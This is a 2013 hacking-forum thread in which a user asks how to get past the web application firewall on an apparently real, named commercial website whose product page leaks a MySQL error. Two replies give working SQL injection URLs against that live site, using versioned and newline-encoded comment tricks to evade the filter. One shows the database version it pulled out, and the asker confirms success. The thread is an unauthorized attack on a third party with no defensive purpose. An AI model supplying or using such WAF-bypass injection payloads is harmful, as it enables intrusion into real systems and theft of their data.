Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
how to bypass this WAF can u help plz
Posted by: versus
Date: April 16, 2013 05:24PM

this vuln url :
http://www.cobra.com.dz/produits_cat_detail.php?id=325'

Une erreur est survenue 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'325 AND actif=1' at line 1 Veuillez contacter votre administrateur

with sqlamp commnade check-waf : it's protected, no way to get databases how to bypass it ? plz

Options: ReplyQuote
Re: how to bypass this WAF can u help plz
Posted by: ajkaro
Date: April 17, 2013 03:25AM

Use this:
http://www.cobra.com.dz/produits_cat_detail.php?id=325 and 0 /*!50000union*/ /*!50000select*/ 1,2,3,version(),version()-- -

version: 5.5.23-55

Options: ReplyQuote
Re: how to bypass this WAF can u help plz
Posted by: versus
Date: April 17, 2013 11:26AM

thank's men ;)

all okayy thank's a lot



Edited 2 time(s). Last edit at 04/18/2013 03:08PM by versus.

Options: ReplyQuote
Re: how to bypass this WAF can u help plz
Posted by: hack2012
Date: April 18, 2013 01:38AM

http://www.cobra.com.dz/produits_cat_detail.php?id=-325 /*!%0aUNION*/ /*!%0aSELECT*/ 1,2,3,version(),5--

Options: ReplyQuote
Re: how to bypass this WAF can u help plz
Posted by: versus
Date: April 18, 2013 12:01PM

thnk's hack2012

all okayyy thank's men :) ;)



Edited 1 time(s). Last edit at 04/18/2013 03:08PM by versus.

Options: ReplyQuote


Sorry, only registered users may post in this forum.